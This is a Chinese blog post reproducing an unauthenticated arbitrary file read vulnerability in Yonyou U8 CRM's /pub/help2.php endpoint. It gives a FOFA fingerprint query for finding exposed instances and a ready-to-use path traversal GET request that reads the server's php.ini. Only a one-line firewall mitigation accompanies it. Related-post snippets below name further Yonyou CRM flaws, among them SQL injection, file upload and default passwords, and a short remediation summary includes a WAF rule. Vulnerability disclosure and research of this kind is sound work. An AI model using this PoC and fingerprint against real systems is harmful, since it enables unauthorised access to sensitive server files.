用友 CRM help2.php存在任意文件读取漏洞

最新推荐文章于 2024-08-19 13:17:28 发布
最新推荐文章于 2024-08-19 13:17:28 发布
阅读量854 收藏 9
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/luochen2436/article/details/135087159

文章目录

产品简介

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

漏洞概述

用友CRM系统在help2.php接口处存在任意文件读取漏洞,未授权的攻击者可以通过此漏洞读取服务器上的敏感文件

指纹识别

fofa:

title=="用友U8CRM"

漏洞利用

poc:

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

读取php配置文件
在这里插入图片描述

修复建议

临时缓解措施:在防火墙上设置访问策略,不允许任何人访问该路径

【天底下喜欢讲道理的人,大致可以分为两种,一种是为了让自己心里好受,一种是希望让世道好过。】

用友crm客户关系管理pub/help2.php接口存在任意文件读取漏洞 附POC
nnn2188185的博客
12-20 693
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
用友畅捷CRM存在SQL注入漏洞
nnn2188185的博客
04-21 678
畅捷CRM系统存在SQL注入漏洞,攻击者可以利用该漏洞获得网站后台数据库信息,构成信息泄露风险。
用友crm客户关系管理pub/help.php接口存在任意文件读取漏洞
网安小白
08-19 606
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
用友U8CRM help2.php 任意文件读取漏洞复现
01-23 872
用友U8CRM是一款针对代理销售服务行业设计的管理软件,它集客户关系管理(CRM)、呼叫中心和办公自动化(OA)核心应用于一体,提供前端营销、后端业务处理及员工管理的一体化解决方案。
用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)
weixin_34977368的博客
04-10 1312
用友TurboCRM存在通用sql注入。http://**.**.**.**:8081/login/login.php如下图找到找回密码页访问http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system输入信息抓包POST /login/changepswd.php?orgcode=1&loginna...
用友U8+CRM help2 任意文件读取漏洞复现
0xSec
12-21 1563
用友 U8 CRM客户关系管理系统help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。
用友crm客户关系管理pub/help2.php接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-21 511
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。用友crm pub/help2.php接口存在任意文件读取漏洞
用友 U8+CRM V13-V16.5 任意文件读取漏洞
WuYSec的博客
06-14 867
用友U8 CRM 客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友U8 CRM 客户关系管理系统存在任意文件读取漏洞。无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等。此漏洞影响 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本。app="用友-U8CRM" || title="用友U8CRM"
用友U8CRM reservationcomplete.php 逻辑漏洞复现
03-21 622
用友U8+CRM是一款专为企业提供客户关系管理解决方案的软件。它通过整合多种网络化、低成本营销手段和沟通方式,帮助企业建立与客户之间通畅的交流平台。
用友畅捷通CRM存在默认空口令漏洞
nnn2188185的博客
04-23 640
用友畅捷通CRM存在默认空口令漏洞,攻击者可以利用默认口令登录网站后台,以后台权限进行敏感操作,构成信息泄露风险。
用友U8+CRM 逻辑漏洞登录后台漏洞复现
0xSec
01-06 1765
用友 U8 CRM客户关系管理系统reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
用友U8 crm客户关系管理存在任意文件上传漏洞2 附POC
nnn2188185的博客
09-25 328
用友crm ajax/getemaildata.php任意文件上传漏洞
用友U8 crm客户关系管理任意文件上传漏洞
weixin_68647219的博客
10-07 353
工作发现,用友U8 crm客户关系管理任意文件上传该漏洞是由于ajax/getemaildata.php任意文件上传漏洞,可能导致未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。2.资产测绘鹰图:body="“用友U8CRM”"&&ip.country=="中国"或title="“用友U8CRM”"&&ip.country=="中国"
用友U8+ CRM任意文件上传、任意文件读取 实战
m0_43397796的博客
02-24 2411
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞任意文件上传漏洞
漏洞复现-某友CRM系统某接口存在任意文件读取(附漏洞检测脚本)
jjjj1029056414的博客
12-18 816
漏洞复现-某友CRM系统某接口存在任意文件读取,附带自己写的poc脚本
【复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 903
【复现】用友u8CRM 文件读取漏洞用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
【复现】用友u8CRM 日志信息泄露 漏洞_12
fushuang333的博客
01-08 838
【复现】用友u8CRM 日志信息泄露,U8是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台
weixin_51641247的博客
03-06 1097
漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台
用友u8+任意文件读取
最新发布
01-09
### 关于用友 U8+ 存在任意文件读取漏洞的信息 针对用友 U8+ CRM 系统中存在的多个任意文件读取漏洞,安全公告通常由官方发布并提供详细的修复建议和技术支持。以下是综合整理的安全措施和修复方案: #### 1. 升级版本至最新稳定版 厂商会定期更新软件来修补已知的安全缺陷。对于用友 U8+ CRM 用户而言,应当尽快升级到最新的稳定版本以获得必要的补丁和支持[^1]。 #### 2. 应用官方发布的热补丁程序 如果当前使用的版本无法立即升级,则可以联系供应商获取专门为此类高危漏洞设计的紧急修复包——即所谓的“热补丁”。安装这些临时性的修正能够有效缓解风险直至完成全面迁移工作为止[^2]。 #### 3. 修改应用程序逻辑限制外部输入路径参数范围 开发团队应该重新审视涉及文件操作的功能模块,在编码层面加入严格的验证机制确保传入的数据仅限于预期之内;比如限定可访问目录结构、拒绝处理特殊字符组成的字符串等方法都可以显著降低被恶意利用的可能性[^3]。 #### 4. 配置Web应用防火墙(WAF)增强防护能力 部署WAF作为额外的一道防线可以在不改动源码的情况下过滤掉大部分非法请求。通过定义规则集阻止那些试图绕过正常流程去尝试触发此漏洞的行为模式,从而保护现有业务不受影响的同时也为后续整改争取时间窗口[^4]。 ```bash # WAF配置示例(伪代码) if (request.uri.contains("/pub/help.php") && request.queryString.startsWith("..")) { denyRequest(); } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值